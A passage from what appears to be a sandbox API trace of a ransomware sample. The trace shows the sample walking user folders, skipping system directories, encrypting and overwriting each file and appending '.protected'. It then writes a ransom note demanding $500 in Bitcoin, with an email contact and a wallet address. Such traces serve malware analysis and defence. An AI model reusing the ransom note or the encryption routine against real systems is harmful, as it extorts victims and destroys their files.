lpString2="Windows") returned -1 [0092.588] lstrcmpiW (lpString1="VY8ECdNr.png", lpString2="Program Files") returned 1 [0092.588] lstrcmpiW (lpString1="VY8ECdNr.png", lpString2="Program Files (x86)") returned 1 [0092.588] lstrcmpiW (lpString1="VY8ECdNr.png", lpString2="$Recycle.bin") returned 1 [0092.588] lstrcmpiW (lpString1="VY8ECdNr.png", lpString2="System Volume Information") returned 1 [0092.588] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VY8ECdNr.png") returned 55 [0092.588] StrStrIW (lpFirst="VY8ECdNr.png", lpSrch=".protected") returned 0x0 [0092.588] lstrcmpW (lpString1="VY8ECdNr.png", lpString2="RESTORE_FILES.txt") returned 1 [0092.588] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.588] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.588] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VY8ECdNr.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vy8ecdnr.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.589] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VY8ECdNr.png") returned 55 [0092.589] StrStrW (lpFirst="VY8ECdNr.png", lpSrch=".txt") returned 0x0 [0092.589] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VY8ECdNr.png") returned 55 [0092.589] StrStrW (lpFirst="VY8ECdNr.png", lpSrch=".rar") returned 0x0 [0092.589] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VY8ECdNr.png") returned 55 [0092.589] StrStrW (lpFirst="VY8ECdNr.png", lpSrch=".zip") returned 0x0 [0092.589] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.590] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.590] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.590] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.590] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.590] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.590] CloseHandle (hObject=0xb4) returned 1 [0092.590] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VY8ECdNr.png.protected") returned 65 [0092.590] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VY8ECdNr.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vy8ecdnr.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VY8ECdNr.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vy8ecdnr.png.protected")) returned 1 [0092.591] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.591] lstrcmpiW (lpString1="WXWBO0VxA_ gghD.jpg", lpString2="Windows") returned 1 [0092.591] lstrcmpiW (lpString1="WXWBO0VxA_ gghD.jpg", lpString2="Program Files") returned 1 [0092.591] lstrcmpiW (lpString1="WXWBO0VxA_ gghD.jpg", lpString2="Program Files (x86)") returned 1 [0092.591] lstrcmpiW (lpString1="WXWBO0VxA_ gghD.jpg", lpString2="$Recycle.bin") returned 1 [0092.591] lstrcmpiW (lpString1="WXWBO0VxA_ gghD.jpg", lpString2="System Volume Information") returned 1 [0092.591] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WXWBO0VxA_ gghD.jpg") returned 62 [0092.591] StrStrIW (lpFirst="WXWBO0VxA_ gghD.jpg", lpSrch=".protected") returned 0x0 [0092.591] lstrcmpW (lpString1="WXWBO0VxA_ gghD.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0092.591] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.591] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.591] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WXWBO0VxA_ gghD.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wxwbo0vxa_ gghd.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.592] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WXWBO0VxA_ gghD.jpg") returned 62 [0092.592] StrStrW (lpFirst="WXWBO0VxA_ gghD.jpg", lpSrch=".txt") returned 0x0 [0092.592] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WXWBO0VxA_ gghD.jpg") returned 62 [0092.592] StrStrW (lpFirst="WXWBO0VxA_ gghD.jpg", lpSrch=".rar") returned 0x0 [0092.592] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WXWBO0VxA_ gghD.jpg") returned 62 [0092.592] StrStrW (lpFirst="WXWBO0VxA_ gghD.jpg", lpSrch=".zip") returned 0x0 [0092.592] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.592] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.593] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.593] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.593] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.593] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.593] CloseHandle (hObject=0xb4) returned 1 [0092.593] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WXWBO0VxA_ gghD.jpg.protected") returned 72 [0092.593] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WXWBO0VxA_ gghD.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wxwbo0vxa_ gghd.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WXWBO0VxA_ gghD.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wxwbo0vxa_ gghd.jpg.protected")) returned 1 [0092.594] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.594] lstrcmpiW (lpString1="Y9WcYG5aKLHTpDF6b92d.gif", lpString2="Windows") returned 1 [0092.594] lstrcmpiW (lpString1="Y9WcYG5aKLHTpDF6b92d.gif", lpString2="Program Files") returned 1 [0092.594] lstrcmpiW (lpString1="Y9WcYG5aKLHTpDF6b92d.gif", lpString2="Program Files (x86)") returned 1 [0092.594] lstrcmpiW (lpString1="Y9WcYG5aKLHTpDF6b92d.gif", lpString2="$Recycle.bin") returned 1 [0092.594] lstrcmpiW (lpString1="Y9WcYG5aKLHTpDF6b92d.gif", lpString2="System Volume Information") returned 1 [0092.594] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Y9WcYG5aKLHTpDF6b92d.gif") returned 67 [0092.594] StrStrIW (lpFirst="Y9WcYG5aKLHTpDF6b92d.gif", lpSrch=".protected") returned 0x0 [0092.594] lstrcmpW (lpString1="Y9WcYG5aKLHTpDF6b92d.gif", lpString2="RESTORE_FILES.txt") returned 1 [0092.594] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.594] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.594] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Y9WcYG5aKLHTpDF6b92d.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\y9wcyg5aklhtpdf6b92d.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.595] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Y9WcYG5aKLHTpDF6b92d.gif") returned 67 [0092.595] StrStrW (lpFirst="Y9WcYG5aKLHTpDF6b92d.gif", lpSrch=".txt") returned 0x0 [0092.595] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Y9WcYG5aKLHTpDF6b92d.gif") returned 67 [0092.595] StrStrW (lpFirst="Y9WcYG5aKLHTpDF6b92d.gif", lpSrch=".rar") returned 0x0 [0092.595] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Y9WcYG5aKLHTpDF6b92d.gif") returned 67 [0092.595] StrStrW (lpFirst="Y9WcYG5aKLHTpDF6b92d.gif", lpSrch=".zip") returned 0x0 [0092.595] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x132e, lpOverlapped=0x0) returned 1 [0092.595] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffecd2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.595] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x132e, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x132e, lpOverlapped=0x0) returned 1 [0092.596] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.596] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.596] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.596] CloseHandle (hObject=0xb4) returned 1 [0092.596] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Y9WcYG5aKLHTpDF6b92d.gif.protected") returned 77 [0092.596] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Y9WcYG5aKLHTpDF6b92d.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\y9wcyg5aklhtpdf6b92d.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Y9WcYG5aKLHTpDF6b92d.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\y9wcyg5aklhtpdf6b92d.gif.protected")) returned 1 [0092.597] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0092.597] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0092.597] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RESTORE_FILES.txt") returned 60 [0092.597] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0092.597] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.597] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0092.598] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0092.598] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0092.598] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.598] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0092.598] CloseHandle (hObject=0xa4) returned 1 [0092.598] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.598] lstrcmpiW (lpString1="PrintHood", lpString2="Windows") returned -1 [0092.598] lstrcmpiW (lpString1="PrintHood", lpString2="Program Files") returned -1 [0092.598] lstrcmpiW (lpString1="PrintHood", lpString2="Program Files (x86)") returned -1 [0092.598] lstrcmpiW (lpString1="PrintHood", lpString2="$Recycle.bin") returned 1 [0092.598] lstrcmpiW (lpString1="PrintHood", lpString2="System Volume Information") returned -1 [0092.598] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood") returned 43 [0092.598] lstrcmpW (lpString1="PrintHood", lpString2=".") returned 1 [0092.598] lstrcmpW (lpString1="PrintHood", lpString2="..") returned 1 [0092.598] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*") returned 45 [0092.599] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0092.599] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.599] lstrcmpiW (lpString1="Recent", lpString2="Windows") returned -1 [0092.599] lstrcmpiW (lpString1="Recent", lpString2="Program Files") returned 1 [0092.599] lstrcmpiW (lpString1="Recent", lpString2="Program Files (x86)") returned 1 [0092.599] lstrcmpiW (lpString1="Recent", lpString2="$Recycle.bin") returned 1 [0092.599] lstrcmpiW (lpString1="Recent", lpString2="System Volume Information") returned -1 [0092.599] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent") returned 40 [0092.599] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0092.599] lstrcmpW (lpString1="Recent", lpString2="..") returned 1 [0092.599] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*") returned 42 [0092.599] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0092.599] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.599] lstrcmpiW (lpString1="Saved Games", lpString2="Windows") returned -1 [0092.599] lstrcmpiW (lpString1="Saved Games", lpString2="Program Files") returned 1 [0092.599] lstrcmpiW (lpString1="Saved Games", lpString2="Program Files (x86)") returned 1 [0092.599] lstrcmpiW (lpString1="Saved Games", lpString2="$Recycle.bin") returned 1 [0092.599] lstrcmpiW (lpString1="Saved Games", lpString2="System Volume Information") returned -1 [0092.599] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games") returned 45 [0092.599] lstrcmpW (lpString1="Saved Games", lpString2=".") returned 1 [0092.599] lstrcmpW (lpString1="Saved Games", lpString2="..") returned 1 [0092.599] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*") returned 47 [0092.599] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0092.600] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.600] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.600] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.600] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.600] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.600] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\.") returned 47 [0092.600] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.600] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0092.600] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0092.600] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.600] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.600] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.600] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.600] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.600] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.600] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.600] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.600] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.600] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\..") returned 48 [0092.600] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.600] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.600] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0092.600] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0092.600] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.600] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.601] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.601] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0092.601] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0092.601] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0092.601] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0092.601] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0092.601] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned 57 [0092.601] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0092.601] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0092.601] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.601] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.602] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned 57 [0092.602] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0092.602] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned 57 [0092.602] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0092.602] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned 57 [0092.602] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0092.602] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, 